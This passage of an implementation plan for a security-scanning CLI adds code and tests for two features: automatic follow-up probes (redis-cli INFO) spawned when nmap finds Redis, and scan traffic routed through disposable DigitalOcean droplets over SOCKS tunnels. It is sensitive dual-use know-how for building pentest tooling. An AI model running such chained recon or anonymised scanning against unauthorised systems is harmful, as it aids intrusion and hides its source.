+ """ + name = "redis_probe" + max_spawns = 10 + + # Tools that discover network services + _TRIGGER_TOOLS = {"nmap", "masscan"} + + def __init__(self) -> None: + self._spawned_keys: set[str] = set() + + def evaluate( + self, + state: KillChainState, + scan_id: str, + completed_task: ScanTask, + ) -> list[ScanTask]: + if completed_task.tool not in self._TRIGGER_TOOLS: + return [] + + redis_services = state.get_services("redis") + if not redis_services: + return [] + + tasks: list[ScanTask] = [] + for svc in redis_services: + key = f"{svc.host}:{svc.port}/{svc.protocol}" + if key in self._spawned_keys: + continue + + self._spawned_keys.add(key) # self-track immediately + task_id = f"redis-probe-{svc.host}-{svc.port}" + tasks.append(ScanTask( + id=task_id, + scan_id=scan_id, + name=f"Redis probe {svc.host}:{svc.port}", + tool="redis-cli", + task_type=TaskType.DOCKER_EXEC, + command=f"redis-cli -h {svc.host} -p {svc.port} INFO", + depends_on=[completed_task.id], + priority=20, + tier=ExecutionTier.FAST, + spawned_by=completed_task.id, + spawned_reason=f"nmap discovered Redis on {svc.host}:{svc.port}", + )) + + return tasks + + +def get_builtin_strategies() -> list[MutationStrategy]: + """Return all builtin mutation strategies.""" + return [ + RedisProbeStrategy(), + ] +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_strategy.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add packages/cli/src/opentools/scanner/mutation/strategy.py packages/cli/tests/test_scanner/test_mutation_strategy.py +git commit -m "feat(mutation): add MutationStrategy protocol with RedisProbeStrategy" +``` + +--- + +### Task 4: Engine Integration — Wire Mutation Layer into ScanEngine + +**Files:** +- Modify: `packages/cli/src/opentools/scanner/engine.py:35-63` (`__init__`) +- Modify: `packages/cli/src/opentools/scanner/engine.py:257-274` (`_mark_completed`) +- Modify: 
`packages/cli/src/opentools/scanner/engine.py:350-357` (`_inject_tasks`) +- Test: `packages/cli/tests/test_scanner/test_engine_mutation.py` + +**Context:** The mutation layer hooks into `_mark_completed` after the existing pipeline queueing and before the existing reactive edge evaluation. All mutation logic is synchronous — no `await` points — so the single-threaded event loop guarantee holds. The existing reactive edges remain backward compatible. + +- [ ] **Step 1: Write failing integration tests** + +```python +# packages/cli/tests/test_scanner/test_engine_mutation.py +"""Integration tests: ScanEngine + mutation layer.""" + +import asyncio +from datetime import datetime, timezone +from typing import Callable + +import pytest + +from opentools.scanner.cancellation import CancellationToken +from opentools.scanner.engine import ScanEngine +from opentools.scanner.executor.base import TaskOutput +from opentools.scanner.models import ( + Scan, + ScanStatus, + ScanTask, + TaskStatus, + TaskType, + TargetType, +) +from opentools.scanner.mutation.analyzer import AnalyzerRegistry, NmapAnalyzer +from opentools.scanner.mutation.models import KillChainState +from opentools.scanner.mutation.strategy import RedisProbeStrategy +from opentools.shared.progress import EventBus +from opentools.shared.resource_pool import AdaptiveResourcePool + + +# Nmap XML that discovers a Redis service +NMAP_REDIS_XML = """\ + + + +
+<nmaprun scanner="nmap">
+  <host>
+    <status state="up"/>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="6379">
+        <state state="open"/>
+        <service name="redis"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>
+"""
+
+# Nmap XML with no interesting services
+NMAP_HTTP_ONLY_XML = """\
+<nmaprun scanner="nmap">
+  <host>
+    <status state="up"/>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="80">
+        <state state="open"/>
+        <service name="http"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>
+ + + + + + + +""" + + +class MockExecutor: + def __init__(self, results: dict[str, TaskOutput] | None = None): + self._results = results or {} + self._default = TaskOutput(exit_code=0, stdout="ok", duration_ms=10) + self.executed: list[str] = [] + + async def execute( + self, task: ScanTask, on_output: Callable[[bytes], None], + cancellation: CancellationToken, + ) -> TaskOutput: + self.executed.append(task.id) + return self._results.get(task.id, self._default) + + +def _make_scan() -> Scan: + return Scan( + id="scan-1", engagement_id="eng-1", target="10.0.0.1", + target_type=TargetType.NETWORK, status=ScanStatus.PENDING, + created_at=datetime.now(timezone.utc), + ) + + +def _make_engine_with_mutation( + tasks: list[ScanTask], + executor: MockExecutor, + max_mutation_spawns: int = 100, +) -> ScanEngine: + pool = AdaptiveResourcePool(global_limit=4) + executors = { + TaskType.SHELL: executor, + TaskType.DOCKER_EXEC: executor, + TaskType.MCP_CALL: executor, + } + engine = ScanEngine( + scan=_make_scan(), + resource_pool=pool, + executors=executors, + event_bus=EventBus(), + cancellation=CancellationToken(), + ) + + # Wire up mutation layer + analyzer_registry = AnalyzerRegistry() + analyzer_registry.register_builtins() + engine.set_analyzer_registry(analyzer_registry) + engine.set_mutation_strategies([RedisProbeStrategy()]) + engine.set_max_mutation_spawns(max_mutation_spawns) + + engine.load_tasks(tasks) + return engine + + +class TestEngineMutationIntegration: + @pytest.mark.asyncio + async def test_nmap_redis_spawns_probe(self): + """Nmap finds Redis → engine spawns redis-cli probe → probe runs.""" + executor = MockExecutor(results={ + "nmap-scan": TaskOutput( + exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100, + ), + }) + nmap_task = ScanTask( + id="nmap-scan", scan_id="scan-1", name="nmap", + tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1", + ) + engine = _make_engine_with_mutation([nmap_task], executor) + await engine.run() + + # The spawned 
redis probe should have been executed + assert "nmap-scan" in executor.executed + assert "redis-probe-10.0.0.1-6379" in executor.executed + + # Verify the spawned task has correct metadata + spawned = engine._tasks["redis-probe-10.0.0.1-6379"] + assert spawned.tool == "redis-cli" + assert spawned.spawned_by == "nmap-scan" + assert spawned.status == TaskStatus.COMPLETED + + @pytest.mark.asyncio + async def test_no_mutation_when_no_interesting_services(self): + """Nmap finds only HTTP → no mutation strategies fire.""" + executor = MockExecutor(results={ + "nmap-scan": TaskOutput( + exit_code=0, stdout=NMAP_HTTP_ONLY_XML, duration_ms=100, + ), + }) + nmap_task = ScanTask( + id="nmap-scan", scan_id="scan-1", name="nmap", + tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1", + ) + engine = _make_engine_with_mutation([nmap_task], executor) + await engine.run() + + assert executor.executed == ["nmap-scan"] + assert len(engine._tasks) == 1 + + @pytest.mark.asyncio + async def test_mutation_respects_global_budget(self): + """Global spawn budget prevents unbounded task injection.""" + executor = MockExecutor(results={ + "nmap-scan": TaskOutput( + exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100, + ), + }) + nmap_task = ScanTask( + id="nmap-scan", scan_id="scan-1", name="nmap", + tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1", + ) + engine = _make_engine_with_mutation( + [nmap_task], executor, max_mutation_spawns=0, + ) + await engine.run() + + # Budget is 0 — no mutations allowed + assert executor.executed == ["nmap-scan"] + assert len(engine._tasks) == 1 + + @pytest.mark.asyncio + async def test_mutation_coexists_with_reactive_edges(self): + """Both mutation strategies AND reactive edges can fire on the same task.""" + from opentools.scanner.models import ReactiveEdge + + executor = MockExecutor(results={ + "nmap-scan": TaskOutput( + exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100, + ), + }) + + edge_task = ScanTask( + id="edge-spawned", 
scan_id="scan-1", name="edge-task", + tool="test", task_type=TaskType.SHELL, command="echo edge", + ) + edge = ReactiveEdge( + id="edge-1", trigger_task_id="nmap-scan", + evaluator="always", spawns=[edge_task], + ) + nmap_task = ScanTask( + id="nmap-scan", scan_id="scan-1", name="nmap", + tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1", + reactive_edges=[edge], + ) + + engine = _make_engine_with_mutation([nmap_task], executor) + engine.register_edge_evaluator("always", lambda t, o, e: e.spawns or []) + await engine.run() + + # Both mutation-spawned AND edge-spawned tasks should run + assert "redis-probe-10.0.0.1-6379" in executor.executed + assert "edge-spawned" in executor.executed + + @pytest.mark.asyncio + async def test_kill_chain_state_accessible(self): + """Engine exposes kill chain state for inspection.""" + executor = MockExecutor(results={ + "nmap-scan": TaskOutput( + exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100, + ), + }) + nmap_task = ScanTask( + id="nmap-scan", scan_id="scan-1", name="nmap", + tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1", + ) + engine = _make_engine_with_mutation([nmap_task], executor) + await engine.run() + + state = engine.kill_chain_state + assert state.has_service("redis") + assert state.total_spawned == 1 + + @pytest.mark.asyncio + async def test_no_mutation_without_registry(self): + """Engine works normally when no mutation layer is configured.""" + executor = MockExecutor(results={ + "nmap-scan": TaskOutput( + exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100, + ), + }) + nmap_task = ScanTask( + id="nmap-scan", scan_id="scan-1", name="nmap", + tool="nmap", task_type=TaskType.SHELL, command="nmap 10.0.0.1", + ) + # Build engine WITHOUT mutation layer + pool = AdaptiveResourcePool(global_limit=4) + engine = ScanEngine( + scan=_make_scan(), resource_pool=pool, + executors={TaskType.SHELL: executor, TaskType.DOCKER_EXEC: executor}, + event_bus=EventBus(), cancellation=CancellationToken(), + ) 
+ engine.load_tasks([nmap_task]) + await engine.run() + + # Should complete normally with no mutations + assert executor.executed == ["nmap-scan"] +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_mutation.py::TestEngineMutationIntegration::test_nmap_redis_spawns_probe -v` +Expected: FAIL with `AttributeError: 'ScanEngine' object has no attribute 'set_analyzer_registry'` + +- [ ] **Step 3: Modify ScanEngine.__init__ — add mutation fields** + +In `packages/cli/src/opentools/scanner/engine.py`, add after the existing `self._cache` and `self._pipeline_results` fields (around line 69): + +```python + # Mutation layer (optional — engine works without it) + self._analyzer_registry: AnalyzerRegistry | None = None + self._mutation_strategies: list[Any] = [] + self._kill_chain = KillChainState() + self._max_mutation_spawns: int = 100 +``` + +Add the imports at the top of the file (after the existing imports): + +```python +from opentools.scanner.mutation.models import KillChainState +``` + +Add these public methods after the existing `set_cache` method (around line 122): + +```python + def set_analyzer_registry(self, registry: Any) -> None: + """Set the OutputAnalyzer registry for mutation layer.""" + self._analyzer_registry = registry + + def set_mutation_strategies(self, strategies: list[Any]) -> None: + """Set the mutation strategies for dynamic task injection.""" + self._mutation_strategies = list(strategies) + + def set_max_mutation_spawns(self, limit: int) -> None: + """Set the global budget for mutation-spawned tasks.""" + self._max_mutation_spawns = limit + + @property + def kill_chain_state(self) -> KillChainState: + """Read-only access to accumulated attack surface state.""" + return self._kill_chain +``` + +- [ ] **Step 4: Modify ScanEngine._mark_completed — hook mutation layer** + +Replace the existing `_mark_completed` method (lines 257-274) with: + +```python + def 
_mark_completed(self, task_id: str, output: TaskOutput) -> None: + task = self._tasks[task_id] + task.status = TaskStatus.COMPLETED + task.exit_code = output.exit_code + task.stdout = output.stdout + task.stderr = output.stderr + task.duration_ms = output.duration_ms + task.cached = output.cached + self._completed.add(task_id) + + # Queue output for pipeline processing + if self._pipeline is not None: + self._pipeline_results[task_id] = output + + # --- Mutation layer: analyze → ingest → evaluate strategies --- + mutation_tasks = self._evaluate_mutations(task, output) + + # --- Existing reactive edges (backward compatible) --- + edge_tasks = self._evaluate_edges(task, output) + + all_new = mutation_tasks + edge_tasks + if all_new: + self._inject_tasks(all_new) +``` + +Add the `_evaluate_mutations` method after `_evaluate_edges` (after line 348): + +```python + def _evaluate_mutations( + self, task: ScanTask, output: TaskOutput + ) -> list[ScanTask]: + """Run mutation layer: analyze output, update state, evaluate strategies.""" + if self._analyzer_registry is None: + return [] + + # 1. Extract intel from tool output + analyzer = self._analyzer_registry.get(task.tool) + if analyzer is not None and output.stdout: + bundle = analyzer.analyze(output.stdout, output.stderr or "") + self._kill_chain.ingest(bundle) + + # 2. 
Evaluate strategies against accumulated state + new_tasks: list[ScanTask] = [] + if self._kill_chain.total_spawned >= self._max_mutation_spawns: + return [] + + for strategy in self._mutation_strategies: + budget_used = self._kill_chain.tasks_spawned.get(strategy.name, 0) + if budget_used >= strategy.max_spawns: + continue + + remaining_strategy = strategy.max_spawns - budget_used + remaining_global = self._max_mutation_spawns - self._kill_chain.total_spawned + + spawned = strategy.evaluate(self._kill_chain, self.scan.id, task) + + allowed = min(remaining_strategy, remaining_global, len(spawned)) + accepted: list[ScanTask] = [] + for s in spawned[:allowed]: + if s.id not in self._tasks: + accepted.append(s) + + # Strategies self-track their spawned keys inside evaluate(), + # so the engine only needs to update the global budget. + if accepted: + self._kill_chain.record_spawn(strategy.name, len(accepted)) + new_tasks.extend(accepted) + + return new_tasks +``` + +- [ ] **Step 5: Harden _inject_tasks with dependency validation** + +Replace the existing `_inject_tasks` method (lines 350-357) with: + +```python + def _inject_tasks(self, tasks: list[ScanTask]) -> None: + """Add dynamically spawned tasks to the graph. + + Validates that all dependencies exist. Drops tasks with unknown + dependencies to prevent forward-reference cycles. 
+ """ + for t in tasks: + if t.id in self._tasks: + continue + # Validate all dependencies exist in the graph + valid = True + for dep in t.depends_on: + if dep not in self._tasks: + import logging + logging.getLogger(__name__).warning( + "Dropping spawned task %s: depends on unknown task %s", + t.id, dep, + ) + valid = False + break + if valid: + self._tasks[t.id] = t + for dep in t.depends_on: + self._dependents[dep].add(t.id) +``` + +- [ ] **Step 6: Run integration tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_mutation.py -v` +Expected: All PASS + +- [ ] **Step 7: Run existing engine tests to verify backward compatibility** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine.py -v` +Expected: All PASS — no regressions + +- [ ] **Step 8: Commit** + +```bash +git add packages/cli/src/opentools/scanner/engine.py packages/cli/tests/test_scanner/test_engine_mutation.py +git commit -m "feat(engine): integrate mutation layer — analyzer → state → strategy → inject" +``` + +--- + +## Phase B: Ephemeral Proxy Routing + +### Task 5: Add `env` Parameter to `run_streaming` + +**Files:** +- Modify: `packages/cli/src/opentools/shared/subprocess.py:43-48` (function signature) +- Modify: `packages/cli/src/opentools/shared/subprocess.py:68` (`create_subprocess_exec` call) +- Modify: `packages/cli/tests/test_scanner/test_shared_subprocess.py` + +- [ ] **Step 1: Write failing test for env parameter** + +Add to `packages/cli/tests/test_scanner/test_shared_subprocess.py`: + +```python +class TestRunStreamingEnv: + @pytest.mark.asyncio + async def test_env_vars_passed_to_subprocess(self): + """Custom env dict is forwarded to the child process.""" + import os + custom_env = {**os.environ, "OT_TEST_PROXY": "socks5://127.0.0.1:1080"} + result = await run_streaming( + [sys.executable, "-c", "import os; print(os.environ.get('OT_TEST_PROXY', 'MISSING'))"], + on_output=lambda _: None, + env=custom_env, + ) + 
assert result.exit_code == 0 + assert "socks5://127.0.0.1:1080" in result.stdout + + @pytest.mark.asyncio + async def test_env_none_inherits_parent(self): + """env=None (default) inherits the parent process environment.""" + result = await run_streaming( + [sys.executable, "-c", "import os; print(os.environ.get('PATH', 'MISSING'))"], + on_output=lambda _: None, + ) + assert result.exit_code == 0 + assert "MISSING" not in result.stdout +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_shared_subprocess.py::TestRunStreamingEnv -v` +Expected: FAIL with `TypeError: run_streaming() got an unexpected keyword argument 'env'` + +- [ ] **Step 3: Add env parameter to run_streaming** + +In `packages/cli/src/opentools/shared/subprocess.py`, change the function signature (line 43): + +```python +async def run_streaming( + args: list[str], + on_output: Callable[[bytes], None], + timeout: int = 300, + cancellation: object | None = None, # CancellationToken + env: dict[str, str] | None = None, +) -> SubprocessResult: +``` + +And pass it through at line 68: + +```python + proc = await asyncio.create_subprocess_exec( + *args, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + env=env, + ) +``` + +- [ ] **Step 4: Run all subprocess tests to verify pass + no regressions** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_shared_subprocess.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add packages/cli/src/opentools/shared/subprocess.py packages/cli/tests/test_scanner/test_shared_subprocess.py +git commit -m "feat(subprocess): add env parameter to run_streaming for proxy injection" +``` + +--- + +### Task 6: CloudNodeProvider ABC + DigitalOcean Implementation + +**Files:** +- Create: `packages/cli/src/opentools/scanner/infra/__init__.py` +- Create: `packages/cli/src/opentools/scanner/infra/provider.py` +- Create: 
`packages/cli/src/opentools/scanner/infra/digitalocean.py` +- Test: `packages/cli/tests/test_scanner/test_infra_provider.py` + +- [ ] **Step 1: Write failing tests** + +```python +# packages/cli/tests/test_scanner/test_infra_provider.py +"""Tests for CloudNodeProvider and DigitalOceanProvider.""" + +import asyncio +import json + +import httpx +import pytest + +from opentools.scanner.infra.provider import ( + CloudNodeProvider, + EphemeralNode, + ProvisioningError, + ProvisioningTimeout, +) +from opentools.scanner.infra.digitalocean import DigitalOceanProvider + + +class TestEphemeralNode: + def test_construction(self): + node = EphemeralNode( + provider_id="12345", + ip_address="1.2.3.4", + region="nyc3", + ssh_key_fingerprint="aa:bb:cc", + ) + assert node.provider_id == "12345" + assert node.ip_address == "1.2.3.4" + assert node.tags == [] + + +class TestDigitalOceanProvider: + @pytest.mark.asyncio + async def test_create_node_sends_correct_request(self): + """Verify the POST payload sent to the DO API.""" + captured_request = None + + async def mock_handler(request: httpx.Request) -> httpx.Response: + nonlocal captured_request + captured_request = request + return httpx.Response( + 200, json={"droplet": {"id": 12345}}, + ) + + transport = httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + result = await provider.create_node( + region="nyc3", ssh_public_key="fp:aa:bb", tags=["test"], + ) + assert result == "12345" + body = json.loads(captured_request.content) + assert body["region"] == "nyc3" + assert "test" in body["tags"] + + @pytest.mark.asyncio + async def test_poll_status_active(self): + async def mock_handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "droplet": { + "id": 12345, "status": "active", + "networks": {"v4": [{"ip_address": "1.2.3.4", "type": "public"}]}, + }, + }) + + transport = 
httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + status, ip = await provider.poll_status("12345") + assert status == "active" + assert ip == "1.2.3.4" + + @pytest.mark.asyncio + async def test_poll_status_creating(self): + async def mock_handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "droplet": {"id": 12345, "status": "new", "networks": {"v4": []}}, + }) + + transport = httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + status, ip = await provider.poll_status("12345") + assert status == "creating" + assert ip is None + + @pytest.mark.asyncio + async def test_destroy_node_204(self): + async def mock_handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(204) + + transport = httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + await provider.destroy_node("12345") # should not raise + + @pytest.mark.asyncio + async def test_destroy_node_404_is_idempotent(self): + async def mock_handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(404) + + transport = httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + await provider.destroy_node("12345") # should not raise + + @pytest.mark.asyncio + async def test_wait_until_ready_success(self): + call_count = 0 + + async def mock_handler(request: httpx.Request) -> httpx.Response: + nonlocal call_count + call_count += 1 + if call_count < 3: + return httpx.Response(200, json={ + "droplet": {"id": 12345, "status": "new", "networks": {"v4": []}}, 
+ }) + return httpx.Response(200, json={ + "droplet": { + "id": 12345, "status": "active", + "networks": {"v4": [{"ip_address": "1.2.3.4", "type": "public"}]}, + }, + }) + + transport = httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + ip = await provider.wait_until_ready("12345", poll_interval=0.01, max_polls=10) + assert ip == "1.2.3.4" + assert call_count == 3 + + @pytest.mark.asyncio + async def test_wait_until_ready_timeout(self): + async def mock_handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "droplet": {"id": 12345, "status": "new", "networks": {"v4": []}}, + }) + + transport = httpx.MockTransport(mock_handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.digitalocean.com/v2") + provider = DigitalOceanProvider(client=client) + + with pytest.raises(ProvisioningTimeout): + await provider.wait_until_ready("12345", poll_interval=0.01, max_polls=3) +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_provider.py::TestEphemeralNode -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement CloudNodeProvider, EphemeralNode, DigitalOceanProvider** + +```python +# packages/cli/src/opentools/scanner/infra/__init__.py +"""Ephemeral infrastructure provisioning for proxied scan execution.""" +``` + +```python +# packages/cli/src/opentools/scanner/infra/provider.py +"""CloudNodeProvider ABC and shared types for ephemeral infrastructure.""" + +from __future__ import annotations + +import asyncio +import logging +from abc import ABC, abstractmethod +from typing import Any + +from pydantic import BaseModel, Field + +logger = logging.getLogger(__name__) + + +class EphemeralNode(BaseModel): + """A provisioned ephemeral cloud node.""" + provider_id: str + ip_address: str + region: str + 
ssh_key_fingerprint: str + tags: list[str] = Field(default_factory=list) + metadata: dict[str, Any] = Field(default_factory=dict) + + +class ProvisioningError(Exception): + """Cloud node provisioning failed.""" + + +class ProvisioningTimeout(ProvisioningError): + """Cloud node did not become ready within the polling budget.""" + + +class CloudNodeProvider(ABC): + """Abstract base for provisioning ephemeral proxy nodes. + + All methods are async — they make HTTP calls and must never block + the event loop. + """ + + @abstractmethod + async def create_node( + self, region: str, ssh_public_key: str, tags: list[str], + ) -> str: + """Create a node. Returns the provider resource ID (not yet ready).""" + ... + + @abstractmethod + async def poll_status(self, provider_id: str) -> tuple[str, str | None]: + """Returns (status, ip_address | None). Status: "creating" | "active" | "error".""" + ... + + @abstractmethod + async def destroy_node(self, provider_id: str) -> None: + """Destroy a node. Idempotent — must not raise if already gone.""" + ... + + async def wait_until_ready( + self, + provider_id: str, + poll_interval: float = 3.0, + max_polls: int = 60, + ) -> str: + """Poll until active. Returns IP address. 
Yields to event loop between polls.""" + for attempt in range(max_polls): + status, ip = await self.poll_status(provider_id) + if status == "active" and ip is not None: + logger.info("Node %s ready at %s after %d polls", provider_id, ip, attempt + 1) + return ip + if status == "error": + raise ProvisioningError(f"Node {provider_id} entered error state") + await asyncio.sleep(poll_interval) + raise ProvisioningTimeout( + f"Node {provider_id} not ready after {max_polls * poll_interval:.0f}s" + ) +``` + +```python +# packages/cli/src/opentools/scanner/infra/digitalocean.py +"""DigitalOcean CloudNodeProvider implementation.""" + +from __future__ import annotations + +import uuid + +import httpx + +from opentools.scanner.infra.provider import CloudNodeProvider + + +class DigitalOceanProvider(CloudNodeProvider): + """Provision ephemeral droplets via the DigitalOcean API.""" + + def __init__(self, client: httpx.AsyncClient) -> None: + self._client = client + + @classmethod + def from_token(cls, api_token: str) -> DigitalOceanProvider: + """Create a provider with a new httpx client using the given API token.""" + client = httpx.AsyncClient( + base_url="https://api.digitalocean.com/v2", + headers={"Authorization": f"Bearer {api_token}"}, + timeout=30.0, + ) + return cls(client=client) + + async def create_node( + self, region: str, ssh_public_key: str, tags: list[str], + ) -> str: + resp = await self._client.post("/droplets", json={ + "name": f"ot-proxy-{uuid.uuid4().hex[:8]}", + "region": region, + "size": "s-1vcpu-512mb-10gb", + "image": "ubuntu-24-04-x64", + "ssh_keys": [ssh_public_key], + "tags": tags, + }) + resp.raise_for_status() + return str(resp.json()["droplet"]["id"]) + + async def poll_status(self, provider_id: str) -> tuple[str, str | None]: + resp = await self._client.get(f"/droplets/{provider_id}") + resp.raise_for_status() + droplet = resp.json()["droplet"] + status = "active" if droplet["status"] == "active" else "creating" + ip = None + for net in 
droplet.get("networks", {}).get("v4", []): + if net.get("type") == "public": + ip = net["ip_address"] + break + return status, ip + + async def destroy_node(self, provider_id: str) -> None: + resp = await self._client.delete(f"/droplets/{provider_id}") + if resp.status_code not in (204, 404): + resp.raise_for_status() +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_provider.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add packages/cli/src/opentools/scanner/infra/__init__.py packages/cli/src/opentools/scanner/infra/provider.py packages/cli/src/opentools/scanner/infra/digitalocean.py packages/cli/tests/test_scanner/test_infra_provider.py +git commit -m "feat(infra): add CloudNodeProvider ABC with DigitalOcean implementation" +``` + +--- + +### Task 7: Ephemeral Proxy Context Manager + Shielded Teardown + +**Files:** +- Create: `packages/cli/src/opentools/scanner/infra/proxy.py` +- Test: `packages/cli/tests/test_scanner/test_infra_proxy.py` + +**Context:** This is the critical piece — the `AsyncContextManager` that composes provision → tunnel → teardown with guaranteed cleanup. The `_shielded_destroy` pattern ensures the cloud API DELETE fires even when the parent task is cancelled. + +- [ ] **Step 1: Write failing tests for proxy lifecycle** + +```python +# packages/cli/tests/test_scanner/test_infra_proxy.py +"""Tests for ephemeral_proxy context manager and shielded teardown.""" + +import asyncio + +import pytest + +from opentools.scanner.infra.provider import ( + CloudNodeProvider, + ProvisioningError, +) +from opentools.scanner.infra.proxy import ( + ProxyEndpoint, + _shielded_destroy, + ephemeral_proxy, +) + + +class FakeProvider(CloudNodeProvider): + """In-memory provider for testing. 
No real cloud calls."""
+
+    def __init__(
+        self,
+        ready_after_polls: int = 1,
+        ip_address: str = "1.2.3.4",
+        fail_create: bool = False,
+        fail_destroy: bool = False,
+    ):
+        self.ready_after_polls = ready_after_polls
+        self.ip_address = ip_address
+        self.fail_create = fail_create
+        self.fail_destroy = fail_destroy
+        self.created_ids: list[str] = []
+        self.destroyed_ids: list[str] = []
+        self._poll_count = 0
+
+    async def create_node(self, region, ssh_public_key, tags):
+        if self.fail_create:
+            raise ProvisioningError("create failed")
+        node_id = f"fake-{len(self.created_ids)}"
+        self.created_ids.append(node_id)
+        return node_id
+
+    async def poll_status(self, provider_id):
+        self._poll_count += 1
+        if self._poll_count >= self.ready_after_polls:
+            return "active", self.ip_address
+        return "creating", None
+
+    async def destroy_node(self, provider_id):
+        if self.fail_destroy:
+            raise ProvisioningError("destroy failed")
+        self.destroyed_ids.append(provider_id)
+
+
+class TestShieldedDestroy:
+    @pytest.mark.asyncio
+    async def test_normal_destroy(self):
+        provider = FakeProvider()
+        provider.created_ids.append("node-1")
+        await _shielded_destroy(provider, "node-1")
+        assert "node-1" in provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def test_destroy_survives_cancellation(self):
+        """The destroy call completes even when the outer task is cancelled mid-destroy."""
+        provider = FakeProvider()
+        provider.created_ids.append("node-1")
+        orig_destroy = provider.destroy_node
+
+        async def slow_destroy(provider_id):
+            # Simulate a destroy API call that takes some time
+            await asyncio.sleep(0.05)
+            await orig_destroy(provider_id)
+
+        provider.destroy_node = slow_destroy  # type: ignore[method-assign]
+
+        task = asyncio.ensure_future(_shielded_destroy(provider, "node-1"))
+        await asyncio.sleep(0.01)  # the shielded destroy is now in flight
+        task.cancel()
+        try:
+            await task
+        except asyncio.CancelledError:
+            pass
+
+        # Give the shielded destroy time to complete
+        await asyncio.sleep(0.1)
+        assert "node-1" in provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def 
test_destroy_failure_does_not_raise(self): + """Destroy errors are logged, not raised — we can't do more.""" + provider = FakeProvider(fail_destroy=True) + # Should not raise + await _shielded_destroy(provider, "node-1") + + +class TestProxyEndpoint: + def test_env_includes_proxy_vars(self): + endpoint = ProxyEndpoint(host="1.2.3.4", socks_port=10800) + env = endpoint.env + assert "socks5://127.0.0.1:10800" in env["HTTP_PROXY"] + assert "socks5://127.0.0.1:10800" in env["HTTPS_PROXY"] + assert "socks5://127.0.0.1:10800" in env["ALL_PROXY"] + # Both upper and lower case for tool compatibility + assert "socks5://127.0.0.1:10800" in env["http_proxy"] + assert "socks5://127.0.0.1:10800" in env["https_proxy"] + + def test_env_inherits_parent_env(self): + """Proxy env vars are merged with parent environment.""" + import os + endpoint = ProxyEndpoint(host="1.2.3.4", socks_port=10800) + env = endpoint.env + assert "PATH" in env or "Path" in env # platform-dependent casing + + +class TestEphemeralProxyLifecycle: + @pytest.mark.asyncio + async def test_provision_and_teardown(self): + """Happy path: provision → yield endpoint → destroy.""" + provider = FakeProvider(ready_after_polls=1) + + async with ephemeral_proxy( + provider=provider, + region="nyc3", + ssh_key="test-key", + local_socks_port=10800, + scan_id="scan-1", + _skip_tunnel=True, # skip real SSH for unit test + ) as endpoint: + assert isinstance(endpoint, ProxyEndpoint) + assert endpoint.host == "1.2.3.4" + assert endpoint.socks_port == 10800 + + # After exit, node must be destroyed + assert len(provider.created_ids) == 1 + assert len(provider.destroyed_ids) == 1 + assert provider.created_ids[0] == provider.destroyed_ids[0] + + @pytest.mark.asyncio + async def test_teardown_on_exception(self): + """Node is destroyed even if the body raises.""" + provider = FakeProvider(ready_after_polls=1) + + with pytest.raises(ValueError, match="deliberate"): + async with ephemeral_proxy( + provider=provider, region="nyc3", 
